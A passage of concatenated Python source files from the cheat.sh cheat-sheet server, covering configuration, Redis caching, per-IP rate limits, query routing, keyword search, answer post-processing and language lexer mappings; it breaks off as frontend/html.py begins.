''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(9)) filename = topic_name.replace('/', '.') + "." + nonce filename = os.path.join(CONFIG["path.spool"], filename) open(filename, 'w').write(cheatsheet) def process_post_request(req, topic): """ Process POST request `req`. """ for key, val in req.form.items(): if key == '': if topic is None: topic_name = "UNNAMED" else: topic_name = topic cheatsheet = val else: if val == '': if topic is None: topic_name = "UNNAMED" else: topic_name = topic cheatsheet = key else: topic_name = key cheatsheet = val _save_cheatsheet(topic_name, cheatsheet) File: lib/standalone.py """ Standalone wrapper for the cheat.sh server. """ from __future__ import print_function import sys import textwrap try: import urlparse except ModuleNotFoundError: import urllib.parse as urlparse import config config.CONFIG["cache.type"] = "none" import cheat_wrapper import options def show_usage(): """ Show how to use the program in the standalone mode """ print(textwrap.dedent(""" Usage: lib/standalone.py [OPTIONS] QUERY For OPTIONS see :help """)[1:-1]) def parse_cmdline(args): """ Parses command line arguments and returns query and request_options """ if not args: show_usage() sys.exit(0) query_string = " ".join(args) parsed = urlparse.urlparse("https://srv:0/%s" % query_string) request_options = options.parse_args( urlparse.parse_qs(parsed.query, keep_blank_values=True)) query = parsed.path.lstrip("/") if not query: query = ":firstpage" return query, request_options def main(args): """ standalone wrapper for cheat_wrapper() """ query, request_options = parse_cmdline(args) answer, _ = cheat_wrapper.cheat_wrapper(query, request_options=request_options) sys.stdout.write(answer) if __name__ == '__main__': main(sys.argv[1:]) File: lib/config.py """ Global configuration of the project. All configurable parameters are stored in the global variable CONFIG, the only variable which is exported from the module. Default values of all configuration parameters are specified in the `_CONFIG` dictionary. Those parameters can be overridden by three means: * config file `etc/config.yaml` located in the work dir * config file `etc/config.yaml` located in the project dir (if the work dir and the project dir are not the same) * environment variables prefixed with `CHEATSH_` Configuration placement priorities, from high to low: * environment variables; * configuration file in the workdir * configuration file in the project dir * default values specified in the `_CONFIG` dictionary If the work dir and the project dir are not the same, we do not recommend that you use the config file located in the project dir, except the cases when you use your own cheat.sh fork, and thus configuration is a part of the project repository. In all other cases `WORKDIR/etc/config.yaml` should be preferred. Location of this config file can be overridden by the `CHEATSH_PATH_CONFIG` environment variable. Configuration parameters set by environment variables are mapped in this way: * CHEATSH_ prefix is trimmed * _ replaced with . * the string is lowercased For instance, an environment variable named `CHEATSH_SERVER_PORT` specifies the value for the `server.port` configuration parameter. Only parameters that imply scalar values (integer or string) can be set using environment variables, for the rest config files should be used. If a parameter implies an integer, and the value specified by an environment variable is not an integer, it is ignored. """ from __future__ import print_function import os from pygments.styles import get_all_styles #def get_all_styles(): # return [] _ENV_VAR_PREFIX = "CHEATSH" _MYDIR = os.path.abspath(os.path.join(__file__, '..', '..')) def _config_locations(): """ Return three possible config locations where configuration can be found: * `_WORKDIR`, `_CONF_FILE_WORKDIR`, `_CONF_FILE_MYDIR` """ var = _ENV_VAR_PREFIX + '_PATH_WORKDIR' workdir = os.environ[var] if var in os.environ \ else os.path.join(os.environ['HOME'], '.cheat.sh') var = _ENV_VAR_PREFIX + '_CONFIG' conf_file_workdir = os.environ[var] if var in os.environ \ else os.path.join(workdir, 'etc/config.yaml') conf_file_mydir = os.path.join(_MYDIR, 'etc/config.yaml') return workdir, conf_file_workdir, conf_file_mydir _WORKDIR, _CONF_FILE_WORKDIR, _CONF_FILE_MYDIR = _config_locations() _CONFIG = { "adapters.active": [ "tldr", "cheat", "fosdem", "translation", "rosetta", "late.nz", "question", "cheat.sheets", "cheat.sheets dir", "learnxiny", "rfc", "oeis", "chmod", ], "adapters.mandatory": [ "search", ], "cache.redis.db": 0, "cache.redis.host": "localhost", "cache.redis.port": 6379, "cache.redis.prefix": "", "cache.type": "redis", "frontend.styles": sorted(list(get_all_styles())), "log.level": 4, "path.internal.ansi2html": os.path.join(_MYDIR, "share/ansi2html.sh"), "path.internal.bin": os.path.join(_MYDIR, "bin"), "path.internal.bin.upstream": os.path.join(_MYDIR, "bin", "upstream"), "path.internal.malformed": os.path.join(_MYDIR, "share/static/malformed-response.html"), "path.internal.pages": os.path.join(_MYDIR, "share"), "path.internal.static": os.path.join(_MYDIR, "share/static"), "path.internal.templates": os.path.join(_MYDIR, "share/templates"), "path.internal.vim": os.path.join(_MYDIR, "share/vim"), "path.log.main": "log/main.log", "path.log.queries": "log/queries.log", "path.log.fetch": "log/fetch.log", "path.repositories": "upstream", "path.spool": "spool", "path.workdir": _WORKDIR, "routing.pre": [ ("^$", "search"), ("^[^/]*/rosetta(/|$)", "rosetta"), ("^rfc/", "rfc"), ("^oeis/", "oeis"), ("^chmod/", "chmod"), ("^:", "internal"), ("/:list$", "internal"), ("/$", "cheat.sheets dir"), ], "routing.main": [ ("", "cheat.sheets"), ("", "cheat"), ("", "tldr"), ("", "late.nz"), ("", "fosdem"), ("", "learnxiny"), ], "routing.post": [ ("^[^/ +]*$", "unknown"), ("^[a-z][a-z]-[a-z][a-z]$", "translation"), ], "routing.default": "question", "upstream.url": "https://cheat.sh", "upstream.timeout": 5, "search.limit": 20, "server.bind": "0.0.0.0", "server.port": 8002, } class Config(dict): """ configuration dictionary that handles relative paths properly (making them relative to path.workdir) """ def _absolute_path(self, val): if val.startswith('/'): return val return os.path.join(self['path.workdir'], val) def __init__(self, *args, **kwargs): dict.__init__(self) self.update(*args, **kwargs) def __setitem__(self, key, val): if key.startswith('path.') and not val.startswith('/'): val = self._absolute_path(val) dict.__setitem__(self, key, val) def update(self, *args, **kwargs): """ the built-in __init__ doesn't call update, and the built-in update doesn't call __setitem__, so `update` should be overridden """ newdict = dict(*args, **kwargs) if 'path.workdir' in newdict: self['path.workdir'] = newdict['path.workdir'] for key, val in newdict.items(): self[key] = val def _load_config_from_environ(config): update = {} for key, val in config.items(): if not isinstance(val, str) or isinstance(val, int): continue env_var = _ENV_VAR_PREFIX + '_' + key.replace('.', '_').upper() if not env_var in os.environ: continue env_val = os.environ[env_var] if isinstance(val, int): try: env_val = int(env_val) except (ValueError, TypeError): continue update[key] = env_val return update def _get_nested(data, key): """ Return value for a hierrachical key (like a.b.c). Return None if nothing found. If there is a key with . in the name, and a subdictionary, the former is preferred: >>> print(_get_nested({'a.b': 10, 'a':{'b': 20}}, 'a.b')) 10 >>> print(_get_nested({'a': {'b': 20}}, 'a.b')) 20 >>> print(_get_nested({'a': {'b': {'c': 30}}}, 'a.b.c')) 30 """ if not data or not isinstance(data, dict): return None if '.' not in key: return data.get(key) if key in data: return data[key] parts = key.split('.') for i in range(len(parts))[::-1]: prefix = ".".join(parts[:i]) if prefix in data: return _get_nested(data[prefix], ".".join(parts[i:])) return None def _load_config_from_file(default_config, filename): import yaml update = {} if not os.path.exists(filename): return update with open(filename) as f: newconfig = yaml.load(f.read(), Loader=yaml.SafeLoader) for key, val in default_config.items(): newval = _get_nested(newconfig, key) if newval is None: continue if isinstance(val, int): try: newval = int(newval) except (ValueError, TypeError): continue update[key] = newval return update CONFIG = Config() CONFIG.update(_CONFIG) CONFIG.update(_load_config_from_file(_CONFIG, _CONF_FILE_MYDIR)) if _CONF_FILE_WORKDIR != _CONF_FILE_MYDIR: CONFIG.update(_load_config_from_file(_CONFIG, _CONF_FILE_WORKDIR)) CONFIG.update(_load_config_from_environ(_CONFIG)) if __name__ == "__main__": import doctest doctest.testmod() File: lib/limits.py """ Connection limitation. Number of connections from one IP is limited. We have nothing against scripting and automated queries. Even the opposite, we encourage them. But there are some connection limits that even we can't handle. Currently the limits are quite restrictive, but they will be relaxed in the future. Usage: limits = Limits() not_allowed = limits.check_ip(ip_address) if not_allowed: return "ERROR: %s" % not_allowed """ import time from globals import log _WHITELIST = ['5.9.243.177'] def _time_caps(minutes, hours, days): return { 'min': minutes, 'hour': hours, 'day': days, } class Limits(object): """ Queries limitation (by IP). Exports: check_ip(ip_address) """ def __init__(self): self.intervals = ['min', 'hour', 'day'] self.divisor = _time_caps(60, 3600, 86400) self.limit = _time_caps(30, 600, 1000) self.last_update = _time_caps(0, 0, 0) self.counter = { 'min': {}, 'hour': {}, 'day': {}, } self._clear_counters_if_needed() def _log_visit(self, interval, ip_address): if ip_address not in self.counter[interval]: self.counter[interval][ip_address] = 0 self.counter[interval][ip_address] += 1 def _limit_exceeded(self, interval, ip_address): visits = self.counter[interval][ip_address] limit = self._get_limit(interval) return visits > limit def _get_limit(self, interval): return self.limit[interval] def _report_excessive_visits(self, interval, ip_address): log("%s LIMITED [%s for %s]" % (ip_address, self._get_limit(interval), interval)) def check_ip(self, ip_address): """ Check if `ip_address` is allowed, and if not raise an RuntimeError exception. Return True otherwise """ if ip_address in _WHITELIST: return None self._clear_counters_if_needed() for interval in self.intervals: self._log_visit(interval, ip_address) if self._limit_exceeded(interval, ip_address): self._report_excessive_visits(interval, ip_address) return ("Not so fast! Number of queries per %s is limited to %s" % (interval, self._get_limit(interval))) return None def reset(self): """ Reset all counters for all IPs """ for interval in self.intervals: self.counter[interval] = {} def _clear_counters_if_needed(self): current_time = int(time.time()) for interval in self.intervals: if current_time // self.divisor[interval] != self.last_update[interval]: self.counter[interval] = {} self.last_update[interval] = current_time / self.divisor[interval] File: lib/globals.py """ Global functions that our used everywhere in the project. Please, no global variables here. For the configuration related things see `config.py` """ from __future__ import print_function import sys import logging def fatal(text): """ Fatal error function. The function is being used in the standalone mode only """ sys.stderr.write("ERROR: %s\n" % text) sys.exit(1) def error(text): """ Log error `text` and produce a RuntimeError exception """ if not text.startswith("Too many queries"): print(text) logging.error("ERROR %s", text) raise RuntimeError(text) def log(text): """ Log error `text` (if it does not start with 'Too many queries') """ if not text.startswith("Too many queries"): print(text) logging.info(text) File: lib/cache.py """ Cache implementation. Currently only two types of cache are allowed: * "none" cache switched off * "redis" use redis for cache Configuration parameters: cache.type = redis | none cache.redis.db cache.redis.host cache.redis.port """ import os import json from config import CONFIG _REDIS = None if CONFIG['cache.type'] == 'redis': import redis _REDIS = redis.Redis( host=CONFIG['cache.redis.host'], port=CONFIG['cache.redis.port'], db=CONFIG['cache.redis.db']) _REDIS_PREFIX = '' if CONFIG.get("cache.redis.prefix", ""): _REDIS_PREFIX = CONFIG["cache.redis.prefix"] + ":" def put(key, value): """ Save `value` with `key`, and serialize it if needed """ if _REDIS_PREFIX: key = _REDIS_PREFIX + key if CONFIG["cache.type"] == "redis" and _REDIS: if isinstance(value, (dict, list)): value = json.dumps(value) _REDIS.set(key, value) def get(key): """ Read `value` by `key`, and deserialize it if needed """ if _REDIS_PREFIX: key = _REDIS_PREFIX + key if CONFIG["cache.type"] == "redis" and _REDIS: value = _REDIS.get(key) try: value = json.loads(value) except (ValueError, TypeError): pass return value return None def delete(key): """ Remove `key` from the database """ if _REDIS: if _REDIS_PREFIX: key = _REDIS_PREFIX + key _REDIS.delete(key) return None File: lib/languages_data.py """ Programming languages information. Will be (probably) moved to a separate file/directory from the project tree. """ import pygments.lexers LEXER = { "assembly" : pygments.lexers.NasmLexer, "awk" : pygments.lexers.AwkLexer, "bash" : pygments.lexers.BashLexer, "basic" : pygments.lexers.QBasicLexer, "bf" : pygments.lexers.BrainfuckLexer, "chapel" : pygments.lexers.ChapelLexer, "clojure" : pygments.lexers.ClojureLexer, "coffee" : pygments.lexers.CoffeeScriptLexer, "cpp" : pygments.lexers.CppLexer, "c" : pygments.lexers.CLexer, "csharp" : pygments.lexers.CSharpLexer, "d" : pygments.lexers.DLexer, "dart" : pygments.lexers.DartLexer, "delphi" : pygments.lexers.DelphiLexer, "elisp" : pygments.lexers.EmacsLispLexer, "elixir" : pygments.lexers.ElixirLexer, "elm" : pygments.lexers.ElmLexer, "erlang" : pygments.lexers.ErlangLexer, "factor" : pygments.lexers.FactorLexer, "forth" : pygments.lexers.ForthLexer, "fortran" : pygments.lexers.FortranLexer, "fsharp" : pygments.lexers.FSharpLexer, "git" : pygments.lexers.BashLexer, "go" : pygments.lexers.GoLexer, "groovy" : pygments.lexers.GroovyLexer, "haskell" : pygments.lexers.HaskellLexer, "java" : pygments.lexers.JavaLexer, "js" : pygments.lexers.JavascriptLexer, "julia" : pygments.lexers.JuliaLexer, "kotlin" : pygments.lexers.KotlinLexer, "latex" : pygments.lexers.TexLexer, "lisp" : pygments.lexers.CommonLispLexer, "lua" : pygments.lexers.LuaLexer, "mathematica": pygments.lexers.MathematicaLexer, "matlab" : pygments.lexers.MatlabLexer, "mongo" : pygments.lexers.JavascriptLexer, "nim" : pygments.lexers.NimrodLexer, "objective-c": pygments.lexers.ObjectiveCppLexer, "ocaml" : pygments.lexers.OcamlLexer, "octave" : pygments.lexers.OctaveLexer, "perl" : pygments.lexers.PerlLexer, "perl6" : pygments.lexers.Perl6Lexer, "php" : pygments.lexers.PhpLexer, "psql" : pygments.lexers.PostgresLexer, "python" : pygments.lexers.PythonLexer, "python3" : pygments.lexers.Python3Lexer, "r" : pygments.lexers.SLexer, "racket" : pygments.lexers.RacketLexer, "ruby" : pygments.lexers.RubyLexer, "rust" : pygments.lexers.RustLexer, "solidity" : pygments.lexers.JavascriptLexer, "scala" : pygments.lexers.ScalaLexer, "scheme": pygments.lexers.SchemeLexer, "psql" : pygments.lexers.SqlLexer, "sql" : pygments.lexers.SqlLexer, "swift" : pygments.lexers.SwiftLexer, "tcl" : pygments.lexers.TclLexer, "tcsh" : pygments.lexers.TcshLexer, "vb" : pygments.lexers.VbNetLexer, "vbnet" : pygments.lexers.VbNetLexer, "vim" : pygments.lexers.VimLexer, # experimental "arduino": pygments.lexers.ArduinoLexer, "pike" : pygments.lexers.PikeLexer, "eiffel" : pygments.lexers.EiffelLexer, "clean" : pygments.lexers.CleanLexer, "dylan" : pygments.lexers.DylanLexer, # not languages "cmake" : pygments.lexers.CMakeLexer, "django" : pygments.lexers.PythonLexer, "flask" : pygments.lexers.PythonLexer, } # canonical names are on the right side LANGUAGE_ALIAS = { 'asm' : 'assembly', 'assembler' : 'assembly', 'c++' : 'cpp', 'c#' : 'csharp', 'clisp' : 'lisp', 'coffeescript': 'coffee', 'cplusplus' : 'cpp', 'dlang' : 'd', 'f#' : 'fsharp', 'golang' : 'go', 'javascript': 'js', 'objc' : 'objective-c', 'p6' : 'perl6', 'sh' : 'bash', 'visualbasic': 'vb', 'vba' : 'vb', 'wolfram' : 'mathematica', 'mma' : 'mathematica', 'wolfram-mathematica': 'mathematica', 'm' : 'octave', } VIM_NAME = { 'assembly' : 'asm', 'bash' : 'sh', 'coffeescript': 'coffee', 'csharp' : 'cs', 'delphi' : 'pascal', 'dlang' : 'd', 'elisp' : 'newlisp', 'latex' : 'tex', 'forth' : 'fs', 'nim' : 'nimrod', 'perl6' : 'perl', 'python3' : 'python', 'python-3.x': 'python', 'tcsh' : 'sh', 'solidity' : 'js', 'mathematica': 'mma', 'wolfram-mathematica': 'mma', 'psql' : 'sql', # not languages 'cmake' : 'sh', 'git' : 'sh', 'django' : 'python', 'flask' : 'python', } SO_NAME = { 'coffee' : 'coffeescript', 'js' : 'javascript', 'python3' : 'python-3.x', 'vb' : 'vba', 'mathematica': 'wolfram-mathematica', } # # conversion of internal programmin language names # into canonical cheat.sh names # ATOM_FT_NAME = { } EMACS_FT_NAME = { "asm-mode" : "asm", "awk-mode" : "awk", "sh-mode" : "bash", # basic "brainfuck-mode" : "bf", # chapel "clojure-mode" : "clojure", "coffee-mode" : "coffee", "c++-mode" : "cpp", "c-mode" : "c", "csharp-mode" : "csharp", "d-mode" : "d", "dart-mode" : "dart", "dylan-mode" : "dylan", "delphi-mode" : "delphi", "emacs-lisp-mode" : "elisp", # elixir "elm-mode" : "elm", "erlang-mode" : "erlang", # factor "forth-mode" : "forth", "fortran-mode" : "fortran", "fsharp-mode" : "fsharp", "go-mode" : "go", "groovy-mode" : "groovy", "haskell-mode" : "haskell", # "hy-mode" "java-mode" : "java", "js-jsx-mode" : "js", "js-mode" : "js", "js2-jsx-mode" : "js", "js2-mode" : "js", "julia-mode" : "julia", "kotlin-mode" : "kotlin", "lisp-interaction-mode": "lisp", "lisp-mode" : "lisp", "lua-mode" : "lua", # mathematica "matlab-mode" : "matlab", # mongo "objc-mode" : "objective-c", # ocaml "perl-mode" : "perl", "perl6-mode" : "perl6", "php-mode" : "php", # psql "python-mode" : "python", # python3 # r -- ess looks it, but I don't know the mode name off hand "racket-mode" : "racket", "ruby-mode" : "ruby", "rust-mode" : "rust", "solidity-mode" : "solidity", "scala-mode" : "scala", "scheme-mode" : "scheme", "sql-mode" : "sql", "swift-mode" : "swift", "tcl-mode" : "tcl", # tcsh "visual-basic-mode" : "vb", # vbnet # vim } SUBLIME_FT_NAME = { } VIM_FT_NAME = { 'asm': 'assembler', 'javascript': 'js', 'octave': 'matlab', } VSCODE_FT_NAME = { } def rewrite_editor_section_name(section_name): """ section name cen be specified in form "editor:editor-filetype" and it will be rewritten into form "filetype" basing on the editor filetypes names data. If editor name is unknown, it is just cut off: notepad:js => js Known editors: * atom * vim * emacs * sublime * vscode >>> rewrite_editor_section_name('js') 'js' >>> rewrite_editor_section_name('vscode:js') 'js' """ if ':' not in section_name: return section_name editor_name, section_name = section_name.split(':', 1) editor_name_mapping = { 'atom': ATOM_FT_NAME, 'emacs': EMACS_FT_NAME, 'sublime': SUBLIME_FT_NAME, 'vim': VIM_FT_NAME, 'vscode': VSCODE_FT_NAME, } if editor_name not in editor_name_mapping: return section_name return editor_name_mapping[editor_name].get(section_name, section_name) def get_lexer_name(section_name): """ Rewrite `section_name` for the further lexer search (for syntax highlighting) """ if ':' in section_name: section_name = rewrite_editor_section_name(section_name) return LANGUAGE_ALIAS.get(section_name, section_name) if __name__ == "__main__": import doctest doctest.testmod() File: lib/stateful_queries.py """ Support for the stateful queries """ import cache def save_query(client_id, query): """ Save the last query `query` for the client `client_id` """ cache.put("l:%s" % client_id, query) def last_query(client_id): """ Return the last query for the client `client_id` """ return cache.get("l:%s" % client_id) File: lib/buttons.py TWITTER_BUTTON = """ <a href="https://twitter.com/igor_chubin" class="twitter-follow-button" data-show-count="false" data-button="grey">Follow @igor_chubin</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script> """ GITHUB_BUTTON = """ <!-- Place this tag where you want the button to render. --> <a aria-label="Star chubin/wttr.in on GitHub" data-count-aria-label="# stargazers on GitHub" data-count-api="/repos/chubin/cheat.sh#stargazers_count" data-count-href="/chubin/cheat.sh/stargazers" data-icon="octicon-star" href="https://github.com/chubin/cheat.sh" class="github-button">cheat.sh</a> """ GITHUB_BUTTON_2 = """ <!-- Place this tag where you want the button to render. --> <a aria-label="Star chubin/cheat.sheets on GitHub" data-count-aria-label="# stargazers on GitHub" data-count-api="/repos/chubin/cheat.sheets#stargazers_count" data-count-href="/chubin/cheat.sheets/stargazers" data-icon="octicon-star" href="https://github.com/chubin/cheat.sheets" class="github-button">cheat.sheets</a> """ GITHUB_BUTTON_FOOTER = """ <!-- Place this tag right after the last button or just before your close body tag. --> <script async defer id="github-bjs" src="https://buttons.github.io/buttons.js"></script> """ File: lib/routing.py """ Queries routing and caching. Exports: get_topics_list() get_answers() """ import random import re from typing import Any, Dict, List import cache import adapter.cheat_sheets import adapter.cmd import adapter.internal import adapter.latenz import adapter.learnxiny import adapter.question import adapter.rosetta from config import CONFIG class Router(object): """ Implementation of query routing. Routing is based on `routing_table` and the data exported by the adapters (functions `get_list()` and `is_found()`). `get_topics_list()` returns available topics (accessible at /:list). `get_answer_dict()` return answer for the query. """ def __init__(self): self._cached_topics_list = [] self._cached_topic_type = {} adapter_class = adapter.all_adapters(as_dict=True) active_adapters = set(CONFIG['adapters.active'] + CONFIG['adapters.mandatory']) self._adapter = { "internal": adapter.internal.InternalPages( get_topic_type=self.get_topic_type, get_topics_list=self.get_topics_list), "unknown": adapter.internal.UnknownPages( get_topic_type=self.get_topic_type, get_topics_list=self.get_topics_list), } for by_name in active_adapters: if by_name not in self._adapter: self._adapter[by_name] = adapter_class[by_name]() self._topic_list = { key: obj.get_list() for key, obj in self._adapter.items() } self.routing_table = CONFIG["routing.main"] self.routing_table = CONFIG["routing.pre"] + self.routing_table + CONFIG["routing.post"] def get_topics_list(self, skip_dirs=False, skip_internal=False): """ List of topics returned on /:list """ if self._cached_topics_list: return self._cached_topics_list skip = ['fosdem'] if skip_dirs: skip.append("cheat.sheets dir") if skip_internal: skip.append("internal") sources_to_merge = [x for x in self._adapter if x not in skip] answer = {} for key in sources_to_merge: answer.update({name:key for name in self._topic_list[key]}) answer = sorted(set(answer.keys())) self._cached_topics_list = answer return answer def get_topic_type(self, topic: str) -> List[str]: """ Return list of topic types for `topic` or ["unknown"] if topic can't be determined. """ def __get_topic_type(topic: str) -> List[str]: result = [] for regexp, route in self.routing_table: if re.search(regexp, topic): if route in self._adapter: if self._adapter[route].is_found(topic): result.append(route) else: result.append(route) if not result: return [CONFIG["routing.default"]] # cut the default route off, if there are more than one route found if len(result) > 1: return result[:-1] return result if topic not in self._cached_topic_type: self._cached_topic_type[topic] = __get_topic_type(topic) return self._cached_topic_type[topic] def _get_page_dict(self, query, topic_type, request_options=None): """ Return answer_dict for the `query`. """ return self._adapter[topic_type]\ .get_page_dict(query, request_options=request_options) def handle_if_random_request(self, topic): """ Check if the `query` is a :random one, if yes we check its correctness and then randomly select a topic, based on the provided prefix. """ def __select_random_topic(prefix, topic_list): #Here we remove the special cases cleaned_topic_list = [ x for x in topic_list if '/' not in x and ':' not in x] #Here we still check that cleaned_topic_list in not empty if not cleaned_topic_list: return prefix random_topic = random.choice(cleaned_topic_list) return prefix + random_topic if topic.endswith('/:random') or topic.lstrip('/') == ':random': #We strip the :random part and see if the query is valid by running a get_topics_list() if topic.lstrip('/') == ':random' : topic = topic.lstrip('/') prefix = topic[:-7] topic_list = [x[len(prefix):] for x in self.get_topics_list() if x.startswith(prefix)] if '' in topic_list: topic_list.remove('') if topic_list: # This is a correct formatted random query like /cpp/:random as the topic_list is not empty. random_topic = __select_random_topic(prefix, topic_list) return random_topic else: # This is a wrongly formatted random query like /xyxyxy/:random as the topic_list is empty # we just strip the /:random and let the already implemented logic handle it. wrongly_formatted_random = topic[:-8] return wrongly_formatted_random #Here if not a random requst, we just forward the topic return topic def get_answers(self, topic: str, request_options:Dict[str, str] = None) -> List[Dict[str, Any]]: """ Find cheat sheets for the topic. Args: `topic` (str): the name of the topic of the cheat sheet Returns: [answer_dict]: list of answers (dictionaries) """ # if topic specified as <topic_type>:<topic>, # cut <topic_type> off topic_type = "" if re.match("[^/]+:", topic): topic_type, topic = topic.split(":", 1) topic = self.handle_if_random_request(topic) topic_types = self.get_topic_type(topic) # if topic_type is specified explicitly, # show pages only of that type if topic_type and topic_type in topic_types: topic_types = [topic_type] # 'question' queries are pretty expensive, that's why they should be handled # in a special way: # we do not drop the old style cache entries and try to reuse them if possible if topic_types == ['question']: answer = cache.get('q:' + topic) if answer: if isinstance(answer, dict): return [answer] return [{ 'topic': topic, 'topic_type': 'question', 'answer': answer, 'format': 'text+code', }] answer = self._get_page_dict(topic, topic_types[0], request_options=request_options) if answer.get("cache", True): cache.put('q:' + topic, answer) return [answer] # Try to find cacheable queries in the cache. # If answer was not found in the cache, resolve it in a normal way and save in the cache answers = [] for topic_type in topic_types: cache_entry_name = f"{topic_type}:{topic}" cache_needed = self._adapter[topic_type].is_cache_needed() if cache_needed: answer = cache.get(cache_entry_name) if not isinstance(answer, dict): answer = None if answer: answers.append(answer) continue answer = self._get_page_dict(topic, topic_type, request_options=request_options) if isinstance(answer, dict): if "cache" in answer: cache_needed = answer["cache"] if cache_needed and answer: cache.put(cache_entry_name, answer) answers.append(answer) return answers # pylint: disable=invalid-name _ROUTER = Router() get_topics_list = _ROUTER.get_topics_list get_answers = _ROUTER.get_answers File: lib/cheat_wrapper_test.py from cheat_wrapper import _add_section_name unchanged = """ python/:list ls + g++ g/+ clang++ btrfs~volume :intro :cht.sh python/copy+file python/rosetta/:list emacs:go-mode/:list g++g++ """ split = """ python copy file python/copy file python file python/file python+file python/file g++ -O1 g++/-O1 """ def test_header_split(): for inp in unchanged.strip().splitlines(): assert inp == _add_section_name(inp) for test in split.strip().split('\n\n'): inp, outp = test.split('\n') assert outp == _add_section_name(inp) File: lib/search.py """ Very naive search implementation. Just a placeholder. Exports: find_answer_by_keyword() It should be implemented on the adapter basis: 1. adapter.search(keyword) returns list of matching answers * maybe with some initial weight 2. ranking is done 3. sorted results are returned 4. eage page are cut by keyword 5. results are paginated Configuration parameters: search.limit """ import re from config import CONFIG from routing import get_answers, get_topics_list def _limited_entry(): return { 'topic_type': 'LIMITED', "topic": "LIMITED", 'answer': "LIMITED TO %s ANSWERS" % CONFIG['search.limit'], 'format': "code", } def _parse_options(options): """Parse search options string into optiond_dict """ if options is None: return {} search_options = { 'insensitive': 'i' in options, 'word_boundaries': 'b' in options, 'recursive': 'r' in options, } return search_options def match(paragraph, keyword, options=None, options_dict=None): """Search for each keyword from `keywords` in `page` and if all of them are found, return `True`. Otherwise return `False`. Several keywords can be joined together using ~ For example: ~ssh~passphrase """ if keyword is None: return True if '~' in keyword: keywords = keyword.split('~') else: keywords = [keyword] if options_dict is None: options_dict = _parse_options(options) for kwrd in keywords: if not kwrd: continue regex = re.escape(kwrd) if options_dict["word_boundaries"]: regex = r"\b%s\b" % kwrd if options_dict["insensitive"]: if not re.search(regex, paragraph, re.IGNORECASE): return False else: if not re.search(regex, paragraph): return False return True def find_answers_by_keyword(directory, keyword, options="", request_options=None): """ Search in the whole tree of all cheatsheets or in its subtree `directory` by `keyword` """ options_dict = _parse_options(options) answers_found = [] for topic in get_topics_list(skip_internal=True, skip_dirs=True): if not topic.startswith(directory): continue subtopic = topic[len(directory):] if not options_dict["recursive"] and '/' in subtopic: continue answer_dicts = get_answers(topic, request_options=request_options) for answer_dict in answer_dicts: answer_text = answer_dict.get('answer', '') # Temporary hotfix: # In some cases answer_text may be 'bytes' and not 'str' if type(b"") == type(answer_text): answer_text = answer_text.decode("utf-8") if match(answer_text, keyword, options_dict=options_dict): answers_found.append(answer_dict) if len(answers_found) > CONFIG['search.limit']: answers_found.append( _limited_entry() ) break return answers_found File: lib/postprocessing.py import search import fmt.comments def postprocess(answer, keyword, options, request_options=None): answer = _answer_add_comments(answer, request_options=request_options) answer = _answer_filter_by_keyword(answer, keyword, options, request_options=request_options) return answer def _answer_add_comments(answer, request_options=None): if answer['format'] != 'text+code': return answer topic = answer['topic'] if "filetype" in answer: filetype = answer["filetype"] else: filetype = 'bash' if '/' in topic: filetype = topic.split('/', 1)[0] if filetype.startswith('q:'): filetype = filetype[2:] answer['answer'] = fmt.comments.beautify( answer['answer'], filetype, request_options) answer['format'] = 'code' answer['filetype'] = filetype return answer def _answer_filter_by_keyword(answer, keyword, options, request_options=None): answer['answer'] = _filter_by_keyword(answer['answer'], keyword, options) return answer def _filter_by_keyword(answer, keyword, options): def _join_paragraphs(paragraphs): answer = "\n".join(paragraphs) return answer def _split_paragraphs(text): answer = [] paragraph = "" if isinstance(text, bytes): text = text.decode("utf-8") for line in text.splitlines(): if line == "": answer.append(paragraph) paragraph = "" else: paragraph += line+"\n" answer.append(paragraph) return answer paragraphs = [p for p in _split_paragraphs(answer) if search.match(p, keyword, options=options)] if not paragraphs: return "" return _join_paragraphs(paragraphs) File: lib/cheat_wrapper.py """ Main cheat.sh wrapper. Parse the query, get answers from getters (using get_answer), visualize it using frontends and return the result. Exports: cheat_wrapper() """ import re import json from routing import get_answers, get_topics_list from search import find_answers_by_keyword from languages_data import LANGUAGE_ALIAS, rewrite_editor_section_name import postprocessing import frontend.html import frontend.ansi def _add_section_name(query): # temporary solution before we don't find a fixed one if ' ' not in query and '+' not in query: return query if '/' in query: return query if ' ' in query: return re.sub(r' +', '/', query, count=1) if '+' in query: # replace only single + to avoid catching g++ and friends return re.sub(r'([^\+])\+([^\+])', r'\1/\2', query, count=1) def cheat_wrapper(query, request_options=None, output_format='ansi'): """ Function that delivers cheat sheet for `query`. If `html` is True, the answer is formatted as HTML. Additional request options specified in `request_options`. """ def _rewrite_aliases(word): if word == ':bash.completion': return ':bash_completion' return word def _rewrite_section_name(query): """ Rewriting special section names: * EDITOR:NAME => emacs:go-mode """ if '/' not in query: return query section_name, rest = query.split('/', 1) if ':' in section_name: section_name = rewrite_editor_section_name(section_name) section_name = LANGUAGE_ALIAS.get(section_name, section_name) return "%s/%s" % (section_name, rest) def _sanitize_query(query): return re.sub('[<>"]', '', query) def _strip_hyperlink(query): return re.sub('(,[0-9]+)+$', '', query) def _parse_query(query): topic = query keyword = None search_options = "" keyword = None if '~' in query: topic = query pos = topic.index('~') keyword = topic[pos+1:] topic = topic[:pos] if '/' in keyword: search_options = keyword[::-1] search_options = search_options[:search_options.index('/')] keyword = keyword[:-len(search_options)-1] return topic, keyword, search_options query = _sanitize_query(query) query = _add_section_name(query) query = _rewrite_aliases(query) query = _rewrite_section_name(query) # at the moment, we just remove trailing slashes # so queries python/ and python are equal # query = _strip_hyperlink(query.rstrip('/')) topic, keyword, search_options = _parse_query(query) if keyword: answers = find_answers_by_keyword( topic, keyword, options=search_options, request_options=request_options) else: answers = get_answers(topic, request_options=request_options) answers = [ postprocessing.postprocess( answer, keyword, search_options, request_options=request_options) for answer in answers ] answer_data = { 'query': query, 'keyword': keyword, 'answers': answers, } if output_format == 'html': answer_data['topics_list'] = get_topics_list() return frontend.html.visualize(answer_data, request_options) elif output_format == 'json': return json.dumps(answer_data, indent=4) return frontend.ansi.visualize(answer_data, request_options) File: lib/frontend/html.py """ Configuration parameters: path.internal.ansi2html """ import sys import os import re from subprocess import Popen, PIPE MYDIR = os.path.abspath(os.path.join(__file__, '..', '..')) 